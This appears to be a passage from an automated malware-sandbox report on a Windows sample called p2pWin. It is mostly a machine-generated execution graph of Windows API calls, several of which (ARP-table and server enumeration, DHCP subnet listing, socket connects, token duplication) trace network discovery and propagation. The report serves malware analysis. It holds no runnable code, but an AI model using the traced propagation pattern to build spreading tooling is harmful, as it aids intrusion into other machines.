                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DecodePointer__invoke_watson
                                                • String ID: PNv
                                                • API String ID: 4034010525-4070351811
                                                • Opcode ID: 7d58643cfadaedc3f451affa14d10f3316605741343bf125a4e28fb9ca0c2d2c
                                                • Instruction ID: 98413345130947fbb21fd1ec6d942d832ca7e2b8b92762c9f376773bbf1d8bd0
                                                • Opcode Fuzzy Hash: 7d58643cfadaedc3f451affa14d10f3316605741343bf125a4e28fb9ca0c2d2c
                                                • Instruction Fuzzy Hash: 78E0BD32104209BBDF162FA1EC0A8AA3B6AEB44750B944460BE1580022DA3BC831AAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:14.5%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:19%
                                                Total number of Nodes:1745
                                                Total number of Limit Nodes:28
6801->6812 6803 2e525d2 6802->6803 6804 2e525b9 6802->6804 7339 2e51000 GetProcessHeap HeapAlloc 6803->7339 6805 2e520d0 2 API calls 6804->6805 6807 2e525c1 6805->6807 6809 2e520d0 2 API calls 6807->6809 6808 2e525db 6810 2e525e2 6808->6810 6811 2e525fe memcpy 6808->6811 6809->6812 6813 2e520d0 2 API calls 6810->6813 6811->6810 6812->6423 6814 2e525ea 6813->6814 6815 2e520d0 2 API calls 6814->6815 6816 2e525f2 6815->6816 6817 2e520d0 2 API calls 6816->6817 6817->6812 6819 2e568a0 memset select 6818->6819 6820 2e5690e 6818->6820 6819->6820 6821 2e568f0 6819->6821 6820->6423 6821->6820 6822 2e568f4 send 6821->6822 6822->6820 7341 2e567af memset select 6823->7341 7348 2e51000 GetProcessHeap HeapAlloc 6826->7348 6828 2e53b6d 6829 2e53b76 6828->6829 6830 2e53b7b memset 6828->6830 6829->6423 6833 2e53bab 6830->6833 6832 2e53bfd 6834 2e520d0 2 API calls 6832->6834 6833->6832 6835 2e53bd7 6833->6835 7349 2e53469 6833->7349 6834->6829 6836 2e520d0 2 API calls 6835->6836 6837 2e53bdf 6836->6837 6838 2e5369d 13 API calls 6837->6838 6838->6829 6840 2e56757 6839->6840 6841 2e5675c 6839->6841 6840->6428 6841->6840 6842 2e56762 htons inet_addr connect 6841->6842 6842->6840 7390 2e52620 6843->7390 6847 2e536d8 6848 2e536e1 6847->6848 6849 2e536f3 6847->6849 6850 2e520d0 2 API calls 6848->6850 6851 2e5688f 3 API calls 6849->6851 6852 2e536c7 6850->6852 6853 2e53704 6851->6853 6852->6428 6854 2e53714 6853->6854 6855 2e5243f 5 API calls 6853->6855 6856 2e520d0 2 API calls 6854->6856 6855->6854 6857 2e53723 6856->6857 6858 2e520d0 2 API calls 6857->6858 6858->6852 7414 2e51000 GetProcessHeap HeapAlloc 6859->7414 6861 2e53c19 6862 2e53c27 memset 6861->6862 6868 2e53c22 6861->6868 6863 2e53c39 6862->6863 6863->6863 6864 2e53c4e memset 6863->6864 6865 2e53469 15 API calls 6864->6865 6866 2e53c84 6865->6866 6867 2e520d0 2 API calls 6866->6867 6867->6868 6868->6428 6870 2e530fe 13 API calls 6869->6870 6871 2e55a60 6870->6871 6872 2e531fb 13 API calls 6871->6872 6873 2e55a77 6872->6873 
6873->6428 6875 2e520d6 GetProcessHeap HeapFree 6874->6875 6876 2e520e9 6874->6876 6875->6876 6876->6415 7415 2e51000 GetProcessHeap HeapAlloc 6877->7415 6879 2e5320c 6880 2e5322a 6879->6880 6881 2e52466 3 API calls 6879->6881 6882 2e532a5 6880->6882 7417 2e51000 GetProcessHeap HeapAlloc 6880->7417 6883 2e53250 6881->6883 6882->6404 6884 2e53257 6883->6884 7416 2e51000 GetProcessHeap HeapAlloc 6883->7416 6888 2e520d0 2 API calls 6884->6888 6886 2e532b9 6889 2e532c2 6886->6889 6890 2e532cc 6886->6890 6888->6880 6892 2e520d0 2 API calls 6889->6892 6895 2e5688f 3 API calls 6890->6895 6891 2e53267 6893 2e5326d 6891->6893 6894 2e5327a 6891->6894 6892->6882 6896 2e520d0 2 API calls 6893->6896 6898 2e520d0 2 API calls 6894->6898 6897 2e532de 6895->6897 6896->6884 6899 2e532ee 6897->6899 6901 2e5243f 5 API calls 6897->6901 6900 2e53296 6898->6900 6903 2e520d0 2 API calls 6899->6903 6902 2e520d0 2 API calls 6900->6902 6901->6899 6902->6880 6904 2e532fd 6903->6904 6905 2e520d0 2 API calls 6904->6905 6905->6882 6907 2e52102 FindResourceW 6906->6907 6912 2e52121 6906->6912 6908 2e52116 6907->6908 6907->6912 6909 2e585d0 13 API calls 6908->6909 6909->6912 6911 2e52129 6911->6415 6913 2e51000 GetProcessHeap HeapAlloc 6911->6913 6912->6911 7418 2e51000 GetProcessHeap HeapAlloc 6912->7418 6913->6430 6915 2e53de3 6914->6915 6916 2e53deb 6914->6916 6915->6452 7419 2e51000 GetProcessHeap HeapAlloc 6916->7419 6918 2e53e00 memcpy 6919 2e53e37 6918->6919 6920 2e5330e 16 API calls 6919->6920 6921 2e53e87 6920->6921 6922 2e53ea1 6921->6922 6923 2e53e8c 6921->6923 6925 2e520d0 2 API calls 6922->6925 6924 2e520d0 2 API calls 6923->6924 6926 2e53e94 6924->6926 6927 2e53ea9 6925->6927 6928 2e520d0 2 API calls 6926->6928 6929 2e520d0 2 API calls 6927->6929 6928->6915 6929->6915 6957 2e51000 GetProcessHeap HeapAlloc 6930->6957 6932 2e5271b 6933 2e52728 memcpy 6932->6933 6955 2e527b4 6932->6955 6934 2e5273d 6933->6934 6934->6934 6958 2e51000 GetProcessHeap HeapAlloc 6934->6958 6936 2e5274c 6937 
2e52757 memcpy 6936->6937 6938 2e52752 6936->6938 6937->6938 6939 2e527ac 6938->6939 6959 2e52466 6938->6959 6940 2e520d0 2 API calls 6939->6940 6940->6955 6943 2e527a4 6946 2e520d0 2 API calls 6943->6946 6944 2e527bd 6964 2e51000 GetProcessHeap HeapAlloc 6944->6964 6946->6939 6947 2e527c6 6948 2e527cc 6947->6948 6949 2e527e8 memcpy 6947->6949 6950 2e520d0 2 API calls 6948->6950 6949->6948 6951 2e527d4 6950->6951 6952 2e520d0 2 API calls 6951->6952 6953 2e527dc 6952->6953 6954 2e520d0 2 API calls 6953->6954 6954->6955 6955->6476 6956 2e51000 GetProcessHeap HeapAlloc 6955->6956 6956->6478 6957->6932 6958->6936 6965 2e51000 GetProcessHeap HeapAlloc 6959->6965 6961 2e52471 6962 2e52477 htons 6961->6962 6963 2e524cb 6961->6963 6962->6963 6963->6943 6963->6944 6964->6947 6965->6961 6967 2e528c2 6966->6967 6968 2e528f1 6967->6968 6969 2e528dc 6967->6969 6993 2e528c7 6967->6993 6971 2e528e5 6968->6971 6997 2e51000 GetProcessHeap HeapAlloc 6968->6997 6996 2e51000 GetProcessHeap HeapAlloc 6969->6996 6971->6993 6998 2e52802 6971->6998 6974 2e528ff 6976 2e52906 memcpy 6974->6976 6974->6993 6976->6971 6977 2e52970 6979 2e520d0 2 API calls 6977->6979 6978 2e52466 3 API calls 6980 2e5295f 6978->6980 6979->6993 6981 2e52981 6980->6981 6982 2e52968 6980->6982 7004 2e51000 GetProcessHeap HeapAlloc 6981->7004 6983 2e520d0 2 API calls 6982->6983 6983->6977 6985 2e5298a 6986 2e52991 6985->6986 6987 2e529af memcpy 6985->6987 6988 2e520d0 2 API calls 6986->6988 6987->6986 6989 2e5299b 6988->6989 6990 2e520d0 2 API calls 6989->6990 6991 2e529a3 6990->6991 6992 2e520d0 2 API calls 6991->6992 6992->6993 6993->6498 6994 2e51000 GetProcessHeap HeapAlloc 6993->6994 6994->6493 6995->6506 6996->6971 6997->6974 6999 2e5280a 6998->6999 7002 2e52810 6999->7002 7005 2e51000 GetProcessHeap HeapAlloc 6999->7005 7001 2e52834 7001->7002 7003 2e52898 memcpy 7001->7003 7002->6977 7002->6978 7003->7002 7004->6985 7005->7001 7033 2e51000 GetProcessHeap HeapAlloc 7006->7033 7008 2e529df 7009 2e529ec memcpy 
7008->7009 7019 2e52a91 7008->7019 7010 2e52a01 7009->7010 7034 2e51000 GetProcessHeap HeapAlloc 7010->7034 7012 2e52a10 7013 2e52a16 7012->7013 7014 2e52a1b memcpy 7012->7014 7015 2e52a89 7013->7015 7017 2e52466 3 API calls 7013->7017 7014->7013 7016 2e520d0 2 API calls 7015->7016 7016->7019 7018 2e52a78 7017->7018 7020 2e52a81 7018->7020 7021 2e52a9a 7018->7021 7019->6512 7032 2e51000 GetProcessHeap HeapAlloc 7019->7032 7022 2e520d0 2 API calls 7020->7022 7035 2e51000 GetProcessHeap HeapAlloc 7021->7035 7022->7015 7024 2e52aa3 7025 2e52ac5 memcpy 7024->7025 7026 2e52aa9 7024->7026 7025->7026 7027 2e520d0 2 API calls 7026->7027 7028 2e52ab1 7027->7028 7029 2e520d0 2 API calls 7028->7029 7030 2e52ab9 7029->7030 7031 2e520d0 2 API calls 7030->7031 7031->7019 7032->6514 7033->7008 7034->7012 7035->7024 7037 2e52cdb 7036->7037 7038 2e52ce1 7037->7038 7045 2e51000 GetProcessHeap HeapAlloc 7037->7045 7038->6528 7038->6536 7040 2e52cfe 7040->7038 7041 2e52d67 memcpy 7040->7041 7041->7038 7042->6534 7043->6531 7044->6554 7045->7040 7063 2e52adf 7046->7063 7049 2e52466 3 API calls 7050 2e52c67 7049->7050 7058 2e52c6e 7050->7058 7067 2e51000 GetProcessHeap HeapAlloc 7050->7067 7052 2e52c7c 7054 2e52c97 memcpy 7052->7054 7055 2e52c83 7052->7055 7053 2e520d0 2 API calls 7061 2e52c93 7053->7061 7057 2e520d0 2 API calls 7054->7057 7056 2e520d0 2 API calls 7055->7056 7056->7058 7059 2e52cbd 7057->7059 7058->7053 7060 2e520d0 2 API calls 7059->7060 7060->7061 7061->6563 7062 2e51000 GetProcessHeap HeapAlloc 7061->7062 7062->6565 7064 2e52af6 7063->7064 7068 2e51000 GetProcessHeap HeapAlloc 7064->7068 7066 2e52b0f 7066->7049 7066->7061 7067->7052 7068->7066 7128 2e52d82 7069->7128 7072 2e53752 7075 2e537e3 7072->7075 7133 2e51000 GetProcessHeap HeapAlloc 7072->7133 7073 2e52466 3 API calls 7074 2e53781 7073->7074 7076 2e5378a 7074->7076 7132 2e51000 GetProcessHeap HeapAlloc 7074->7132 7075->6577 7080 2e520d0 2 API calls 7076->7080 7078 2e537f7 7081 2e53800 7078->7081 7082 2e5380a 
7078->7082 7080->7072 7084 2e520d0 2 API calls 7081->7084 7087 2e5688f 3 API calls 7082->7087 7083 2e5379a 7085 2e537a1 7083->7085 7086 2e537ae memcpy 7083->7086 7084->7075 7088 2e520d0 2 API calls 7085->7088 7090 2e520d0 2 API calls 7086->7090 7089 2e5381b 7087->7089 7088->7076 7092 2e5243f 5 API calls 7089->7092 7097 2e5382b 7089->7097 7091 2e537d1 7090->7091 7093 2e520d0 2 API calls 7091->7093 7092->7097 7093->7072 7094 2e520d0 2 API calls 7095 2e5383a 7094->7095 7096 2e520d0 2 API calls 7095->7096 7096->7075 7097->7094 7098->6584 7135 2e52e30 7099->7135 7102 2e5388d 7104 2e5391d 7102->7104 7142 2e51000 GetProcessHeap HeapAlloc 7102->7142 7103 2e52466 3 API calls 7105 2e538bc 7103->7105 7104->6589 7106 2e538c5 7105->7106 7141 2e51000 GetProcessHeap HeapAlloc 7105->7141 7110 2e520d0 2 API calls 7106->7110 7108 2e53931 7111 2e53944 7108->7111 7112 2e5393a 7108->7112 7110->7102 7117 2e5688f 3 API calls 7111->7117 7114 2e520d0 2 API calls 7112->7114 7113 2e538d8 7115 2e538de 7113->7115 7116 2e538eb memcpy 7113->7116 7114->7104 7118 2e520d0 2 API calls 7115->7118 7120 2e520d0 2 API calls 7116->7120 7119 2e53956 7117->7119 7118->7106 7122 2e53966 7119->7122 7124 2e5243f 5 API calls 7119->7124 7121 2e5390e 7120->7121 7123 2e520d0 2 API calls 7121->7123 7125 2e520d0 2 API calls 7122->7125 7123->7102 7124->7122 7126 2e53975 7125->7126 7127 2e520d0 2 API calls 7126->7127 7127->7104 7129 2e52d96 7128->7129 7134 2e51000 GetProcessHeap HeapAlloc 7129->7134 7131 2e52dc7 7131->7072 7131->7073 7132->7083 7133->7078 7134->7131 7136 2e52e38 7135->7136 7140 2e52e3e 7136->7140 7143 2e51000 GetProcessHeap HeapAlloc 7136->7143 7138 2e52e61 7139 2e52ed7 memcpy 7138->7139 7138->7140 7139->7140 7140->7102 7140->7103 7141->7113 7142->7108 7143->7138 7144->6594 7145->6597 7175 2e51000 GetProcessHeap HeapAlloc 7146->7175 7148 2e53111 7149 2e53118 7148->7149 7150 2e52466 3 API calls 7148->7150 7151 2e53192 7149->7151 7177 2e51000 GetProcessHeap HeapAlloc 7149->7177 7152 2e5313e 7150->7152 
7151->6615 7151->6616 7153 2e53145 7152->7153 7176 2e51000 GetProcessHeap HeapAlloc 7152->7176 7157 2e520d0 2 API calls 7153->7157 7155 2e531a6 7158 2e531af 7155->7158 7159 2e531b9 7155->7159 7157->7149 7161 2e520d0 2 API calls 7158->7161 7164 2e5688f 3 API calls 7159->7164 7160 2e53155 7162 2e53168 7160->7162 7163 2e5315b 7160->7163 7161->7151 7166 2e520d0 2 API calls 7162->7166 7167 2e520d0 2 API calls 7163->7167 7165 2e531cb 7164->7165 7168 2e531db 7165->7168 7170 2e5243f 5 API calls 7165->7170 7169 2e53183 7166->7169 7167->7153 7172 2e520d0 2 API calls 7168->7172 7171 2e520d0 2 API calls 7169->7171 7170->7168 7171->7149 7173 2e531ea 7172->7173 7174 2e520d0 2 API calls 7173->7174 7174->7151 7175->7148 7176->7160 7177->7155 7178->6625 7180 2e53999 7179->7180 7181 2e5399e 7180->7181 7221 2e51000 GetProcessHeap HeapAlloc 7180->7221 7184 2e52466 3 API calls 7181->7184 7196 2e53a04 7181->7196 7183 2e539af 7183->7181 7185 2e539e4 memcpy 7183->7185 7186 2e53a30 7184->7186 7185->7181 7206 2e53a39 7186->7206 7222 2e51000 GetProcessHeap HeapAlloc 7186->7222 7187 2e53a94 7187->6646 7188 2e53b3d 7192 2e5688f 3 API calls 7188->7192 7189 2e53aa8 7223 2e51000 GetProcessHeap HeapAlloc 7189->7223 7213 2e53af3 7192->7213 7193 2e520d0 2 API calls 7193->7196 7194 2e53ab2 7197 2e53ac5 7194->7197 7198 2e53abb 7194->7198 7195 2e53a4c 7199 2e53a60 memcpy 7195->7199 7200 2e53a53 7195->7200 7196->7187 7196->7188 7196->7189 7204 2e5688f 3 API calls 7197->7204 7202 2e520d0 2 API calls 7198->7202 7205 2e520d0 2 API calls 7199->7205 7203 2e520d0 2 API calls 7200->7203 7201 2e520d0 2 API calls 7201->7187 7202->7187 7203->7206 7207 2e53ad7 7204->7207 7208 2e53a82 7205->7208 7206->7193 7209 2e53aeb 7207->7209 7211 2e5243f 5 API calls 7207->7211 7210 2e520d0 2 API calls 7208->7210 7212 2e520d0 2 API calls 7209->7212 7210->7196 7214 2e53ae7 7211->7214 7212->7213 7213->7201 7214->7209 7215 2e53b02 7214->7215 7224 2e51000 GetProcessHeap HeapAlloc 7215->7224 7217 2e53b0f 7218 2e53b30 7217->7218 7219 
2e53b18 memcpy 7217->7219 7220 2e520d0 2 API calls 7218->7220 7219->7218 7220->7213 7221->7183 7222->7195 7223->7194 7224->7217 7225->6664 7226->6661 7227->6668 7236 2e51000 GetProcessHeap HeapAlloc 7228->7236 7230 2e5483e 7230->6689 7235 2e51000 GetProcessHeap HeapAlloc 7230->7235 7231 2e54837 7231->7230 7232 2e53986 16 API calls 7231->7232 7233 2e5488a 7232->7233 7234 2e520d0 2 API calls 7233->7234 7234->7230 7235->6683 7236->7231 7237->6693 7240 2e54b15 7238->7240 7239 2e54b5d 7239->6696 7240->7239 7242 2e54820 16 API calls 7240->7242 7243 2e54b59 7240->7243 7241 2e53986 16 API calls 7241->7239 7242->7243 7243->7239 7243->7241 7245 2e54c40 7244->7245 7312 2e51000 GetProcessHeap HeapAlloc 7245->7312 7247 2e54c59 7248 2e54afe 16 API calls 7247->7248 7290 2e54c60 7247->7290 7249 2e54cb7 7248->7249 7250 2e520d0 2 API calls 7249->7250 7251 2e54cc2 7250->7251 7252 2e54da2 7251->7252 7251->7290 7313 2e51000 GetProcessHeap HeapAlloc 7251->7313 7252->7290 7315 2e51000 GetProcessHeap HeapAlloc 7252->7315 7255 2e54db3 7256 2e54afe 16 API calls 7255->7256 7255->7290 7258 2e54def 7256->7258 7257 2e54ce6 7259 2e54afe 16 API calls 7257->7259 7257->7290 7260 2e520d0 2 API calls 7258->7260 7261 2e54d3c 7259->7261 7262 2e54dfa 7260->7262 7263 2e520d0 2 API calls 7261->7263 7265 2e54e94 7262->7265 7262->7290 7316 2e51000 GetProcessHeap HeapAlloc 7262->7316 7264 2e54d47 7263->7264 7264->7290 7314 2e51000 GetProcessHeap HeapAlloc 7264->7314 7266 2e54ee9 7265->7266 7265->7290 7317 2e51000 GetProcessHeap HeapAlloc 7265->7317 7266->7290 7318 2e51000 GetProcessHeap HeapAlloc 7266->7318 7271 2e54e1a 7275 2e54afe 16 API calls 7271->7275 7271->7290 7272 2e54f0b 7276 2e53986 16 API calls 7272->7276 7272->7290 7273 2e54d63 7277 2e54afe 16 API calls 7273->7277 7273->7290 7274 2e54eae 7278 2e54afe 16 API calls 7274->7278 7274->7290 7279 2e54e4d 7275->7279 7282 2e54f43 7276->7282 7283 2e54d97 7277->7283 7284 2e54edf 7278->7284 7280 2e54e52 7279->7280 7281 2e54e5f 7279->7281 7285 2e520d0 2 API 
calls 7280->7285 7286 2e54afe 16 API calls 7281->7286 7287 2e520d0 2 API calls 7282->7287 7288 2e520d0 2 API calls 7283->7288 7289 2e520d0 2 API calls 7284->7289 7285->7290 7291 2e54e89 7286->7291 7293 2e54f4d 7287->7293 7288->7252 7289->7266 7290->6702 7292 2e520d0 2 API calls 7291->7292 7292->7265 7293->7290 7319 2e51000 GetProcessHeap HeapAlloc 7293->7319 7295 2e54f7e 7296 2e54f87 7295->7296 7297 2e54f99 memcpy 7295->7297 7298 2e520d0 2 API calls 7296->7298 7297->7296 7298->7290 7320 2e51000 GetProcessHeap HeapAlloc 7299->7320 7301 2e520d0 2 API calls 7303 2e55106 7301->7303 7302 2e54c1c 17 API calls 7306 2e550fd 7302->7306 7303->6709 7303->6710 7304 2e551e6 7305 2e520d0 2 API calls 7304->7305 7307 2e551d9 7305->7307 7306->7302 7306->7303 7306->7304 7306->7307 7308 2e55189 memcpy 7306->7308 7310 2e551c8 7306->7310 7307->7301 7309 2e520d0 2 API calls 7308->7309 7309->7306 7311 2e520d0 2 API calls 7310->7311 7311->7303 7312->7247 7313->7257 7314->7273 7315->7255 7316->7271 7317->7274 7318->7272 7319->7295 7320->7306 7321->6716 7322->6726 7323->6741 7324->6724 7325->6739 7326->6742 7327->6743 7328->6763 7329->6773 7330->6785 7331->6787 7332->6795 7334 2e524dd 7333->7334 7335 2e524d9 7333->7335 7340 2e51000 GetProcessHeap HeapAlloc 7334->7340 7335->6798 7335->6799 7337 2e524ee 7337->7335 7338 2e524f4 memcpy 7337->7338 7338->7335 7339->6808 7340->7337 7342 2e5680e 7341->7342 7346 2e5245d 7341->7346 7343 2e56812 recv 7342->7343 7342->7346 7344 2e5682b htons 7343->7344 7343->7346 7345 2e56853 7344->7345 7344->7346 7345->7346 7347 2e56855 recv 7345->7347 7346->6423 7347->7345 7347->7346 7348->6828 7350 2e53483 7349->7350 7351 2e53488 7349->7351 7354 2e534e1 7350->7354 7356 2e52466 3 API calls 7350->7356 7387 2e51000 GetProcessHeap HeapAlloc 7351->7387 7353 2e53496 7353->7350 7355 2e5349c memcpy 7353->7355 7358 2e53575 7354->7358 7359 2e53585 7354->7359 7360 2e535e8 7354->7360 7355->7350 7357 2e53510 7356->7357 7361 2e53519 7357->7361 7388 2e51000 GetProcessHeap 
HeapAlloc 7357->7388 7358->6833 7389 2e51000 GetProcessHeap HeapAlloc 7359->7389 7364 2e5688f 3 API calls 7360->7364 7365 2e520d0 2 API calls 7361->7365 7368 2e535cc 7364->7368 7365->7354 7366 2e5358b 7369 2e53594 7366->7369 7370 2e5359e 7366->7370 7367 2e5352c 7371 2e53540 memcpy 7367->7371 7372 2e53533 7367->7372 7373 2e520d0 2 API calls 7368->7373 7374 2e520d0 2 API calls 7369->7374 7376 2e5688f 3 API calls 7370->7376 7377 2e520d0 2 API calls 7371->7377 7375 2e520d0 2 API calls 7372->7375 7373->7358 7374->7358 7375->7361 7378 2e535b0 7376->7378 7379 2e53563 7377->7379 7380 2e535c4 7378->7380 7382 2e5243f 5 API calls 7378->7382 7381 2e520d0 2 API calls 7379->7381 7383 2e520d0 2 API calls 7380->7383 7381->7354 7384 2e535c0 7382->7384 7383->7368 7384->7380 7385 2e535db 7384->7385 7386 2e520d0 2 API calls 7385->7386 7386->7368 7387->7353 7388->7367 7389->7366 7411 2e51000 GetProcessHeap HeapAlloc 7390->7411 7392 2e5262d 7399 2e526c1 7392->7399 7412 2e51000 GetProcessHeap HeapAlloc 7392->7412 7394 2e52659 7395 2e526b9 7394->7395 7396 2e52466 3 API calls 7394->7396 7397 2e520d0 2 API calls 7395->7397 7398 2e526a8 7396->7398 7397->7399 7400 2e526b1 7398->7400 7401 2e526ca 7398->7401 7399->6852 7410 2e51000 GetProcessHeap HeapAlloc 7399->7410 7402 2e520d0 2 API calls 7400->7402 7413 2e51000 GetProcessHeap HeapAlloc 7401->7413 7402->7395 7404 2e526d3 7405 2e520d0 2 API calls 7404->7405 7406 2e526e1 7405->7406 7407 2e520d0 2 API calls 7406->7407 7408 2e526e9 7407->7408 7409 2e520d0 2 API calls 7408->7409 7409->7399 7410->6847 7411->7392 7412->7394 7413->7404 7414->6861 7415->6879 7416->6891 7417->6886 7418->6911 7419->6918 7421 2e56fc7 14 API calls 7420->7421 7422 2e57c30 7421->7422 7423 2e56fc7 14 API calls 7422->7423 7424 2e57c3b GetComputerNameExW 7423->7424 7425 2e57c65 CreateThread 7424->7425 7426 2e57c59 7424->7426 7430 2e57c79 7425->7430 7514 2e58e7f 7425->7514 7427 2e56fc7 14 API calls 7426->7427 7427->7425 7431 2e57c98 Sleep 7430->7431 7487 2e5777b LoadLibraryW 
7430->7487 7497 2e5786b GetIpNetTable 7430->7497 7507 2e5795a NetServerEnum 7430->7507 7431->7430 7435 2e5a125 GetProcessHeap HeapAlloc 7434->7435 7436 2e5a11e 7434->7436 7438 2e5a153 GetProcessHeap HeapAlloc 7435->7438 7439 2e5a26b 7435->7439 7437 2e59f8e 130 API calls 7436->7437 7437->7435 7438->7439 7440 2e5a16c 7438->7440 7581 2e56f40 7440->7581 7442 2e5a1a1 CreateThread 7443 2e5a263 7442->7443 7446 2e5a175 7442->7446 7588 2e5a073 7442->7588 7587 2e56f78 GetProcessHeap HeapFree 7443->7587 7445 2e5a1d9 WaitForMultipleObjects 7445->7443 7445->7446 7446->7439 7446->7442 7446->7445 7450 2e5a18a 7446->7450 7447 2e5a219 CloseHandle 7448 2e5a22b GetProcessHeap HeapAlloc 7447->7448 7448->7443 7449 2e5a23a GetProcessHeap HeapAlloc 7448->7449 7449->7443 7449->7450 7450->7443 7450->7446 7450->7447 7450->7448 7584 2e56f02 7450->7584 7453 2e56f40 7 API calls 7452->7453 7456 2e5a299 7453->7456 7454 2e5a2cf GetProcessHeap HeapFree 7456->7454 7457 2e56f91 5 API calls 7456->7457 7458 2e56f02 3 API calls 7456->7458 7459 2e5a2c9 7456->7459 7718 2e59dc3 7456->7718 7457->7456 7458->7456 7724 2e56f78 GetProcessHeap HeapFree 7459->7724 7462 2e59fcf 7461->7462 7463 2e59fb8 DuplicateTokenEx 7461->7463 7464 2e57091 13 API calls 7462->7464 7463->7462 7465 2e59fe9 7464->7465 7725 2e57a17 WNetOpenEnumW 7465->7725 7470 2e570fa 3 API calls 7471 2e59ffd 7470->7471 7472 2e56f40 7 API calls 7471->7472 7481 2e5a008 7472->7481 7473 2e5a04d 7474 2e5a060 7473->7474 7475 2e5a058 CloseHandle 7473->7475 7477 2e5a065 CloseHandle 7474->7477 7478 2e5a06a 7474->7478 7475->7474 7476 2e59987 78 API calls 7476->7481 7477->7478 7479 2e56f91 StrCmpIW EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 7479->7481 7480 2e56f02 3 API calls 7480->7481 7481->7473 7481->7476 7481->7479 7481->7480 7482 2e5a047 7481->7482 7743 2e56f78 GetProcessHeap HeapFree 7482->7743 7744 2e58bc6 GetCurrentThread OpenThreadToken 7484->7744 7488 2e57864 7487->7488 7489 2e5779a GetProcAddress 7487->7489 
7488->7430 7490 2e57853 GetLastError 7489->7490 7491 2e577b2 GetProcessHeap RtlAllocateHeap 7489->7491 7492 2e57859 FreeLibrary 7490->7492 7491->7492 7494 2e577d7 7491->7494 7492->7488 7493 2e57841 GetProcessHeap RtlFreeHeap 7493->7492 7494->7493 7495 2e577ff wsprintfW 7494->7495 7496 2e56fc7 14 API calls 7495->7496 7496->7494 7498 2e57897 7497->7498 7500 2e57890 7497->7500 7499 2e578a0 GetProcessHeap HeapAlloc 7498->7499 7498->7500 7499->7500 7501 2e578bf GetIpNetTable 7499->7501 7500->7430 7502 2e57941 GetProcessHeap HeapFree 7501->7502 7503 2e578cb 7501->7503 7502->7500 7503->7502 7504 2e578fb wsprintfW 7503->7504 7506 2e5793d 7503->7506 7505 2e56fc7 14 API calls 7504->7505 7505->7503 7506->7502 7511 2e57995 7507->7511 7508 2e5799c 7509 2e57a0e 7508->7509 7510 2e57a05 NetApiBufferFree 7508->7510 7509->7431 7510->7509 7511->7508 7511->7509 7512 2e5795a 14 API calls 7511->7512 7513 2e56fc7 14 API calls 7511->7513 7512->7511 7513->7511 7515 2e5a4f0 7514->7515 7516 2e58e8f memset memset GetAdaptersInfo 7515->7516 7517 2e5907f 7516->7517 7518 2e58eeb LocalAlloc 7516->7518 7518->7517 7519 2e58f05 GetAdaptersInfo 7518->7519 7520 2e59075 LocalFree 7519->7520 7534 2e58f15 7519->7534 7520->7517 7521 2e58f23 inet_addr inet_addr 7539 2e56916 MultiByteToWideChar 7521->7539 7522 2e58fc8 7543 2e58243 NetServerGetInfo 7522->7543 7527 2e5905e 7527->7520 7532 2e59064 CloseHandle 7527->7532 7528 2e56fc7 14 API calls 7530 2e58f70 GetProcessHeap HeapFree 7528->7530 7529 2e58fe5 LocalAlloc 7533 2e58ff5 inet_addr 7529->7533 7535 2e58fd9 7529->7535 7530->7534 7531 2e56916 4 API calls 7531->7534 7532->7520 7532->7532 7533->7535 7534->7521 7534->7522 7534->7528 7534->7531 7537 2e56fc7 14 API calls 7534->7537 7535->7527 7535->7529 7536 2e59020 htonl htonl CreateThread 7535->7536 7536->7535 7572 2e58e04 7536->7572 7538 2e58fa8 GetProcessHeap HeapFree 7537->7538 7538->7534 7540 2e5693e GetProcessHeap HeapAlloc 7539->7540 7542 2e5696a 7539->7542 7541 2e56956 MultiByteToWideChar 7540->7541 
7540->7542 7541->7542 7542->7534 7544 2e58261 7543->7544 7545 2e58276 NetApiBufferFree 7544->7545 7546 2e5827d 7544->7546 7545->7546 7546->7535 7547 2e5908a GetComputerNameExW DhcpEnumSubnets 7546->7547 7548 2e591f1 7547->7548 7557 2e59101 7547->7557 7548->7535 7549 2e59111 DhcpGetSubnetInfo 7549->7557 7550 2e591e8 DhcpRpcFreeMemory 7550->7548 7551 2e59139 DhcpEnumSubnetClients 7551->7557 7552 2e591cf DhcpRpcFreeMemory 7552->7557 7553 2e5917f htonl 7560 2e5a3d9 7553->7560 7555 2e59193 htonl inet_ntoa 7556 2e56916 4 API calls 7555->7556 7556->7557 7557->7549 7557->7550 7557->7551 7557->7552 7557->7553 7557->7555 7558 2e56fc7 14 API calls 7557->7558 7559 2e591b4 GetProcessHeap HeapFree 7558->7559 7559->7557 7565 2e5a2e8 memset socket 7560->7565 7563 2e5a2e8 8 API calls 7564 2e5a3fd 7563->7564 7564->7557 7566 2e5a345 htons ioctlsocket 7565->7566 7567 2e5a3cf 7565->7567 7568 2e5a374 connect select 7566->7568 7569 2e5a3c8 closesocket 7566->7569 7567->7563 7567->7564 7568->7569 7570 2e5a3b3 __WSAFDIsSet 7568->7570 7569->7567 7570->7569 7571 2e5a3c5 7570->7571 7571->7569 7573 2e58e6f LocalFree 7572->7573 7578 2e58e1e 7572->7578 7574 2e58e24 htonl 7575 2e5a3d9 8 API calls 7574->7575 7575->7578 7576 2e58e31 htonl inet_ntoa 7577 2e56916 4 API calls 7576->7577 7577->7578 7578->7573 7578->7574 7578->7576 7579 2e56fc7 14 API calls 7578->7579 7580 2e58e51 GetProcessHeap HeapFree 7579->7580 7580->7578 7582 2e5711f 7 API calls 7581->7582 7583 2e56f56 7582->7583 7583->7446 7585 2e57167 3 API calls 7584->7585 7586 2e56f13 7585->7586 7586->7450 7587->7439 7589 2e5a0f7 7588->7589 7590 2e5a07f 7588->7590 7591 2e5a0a6 7590->7591 7645 2e59e05 7590->7645 7593 2e5a0ae 7591->7593 7594 2e5a0b9 7591->7594 7597 2e5a0c9 7591->7597 7652 2e59ec7 7593->7652 7596 2e5a0d9 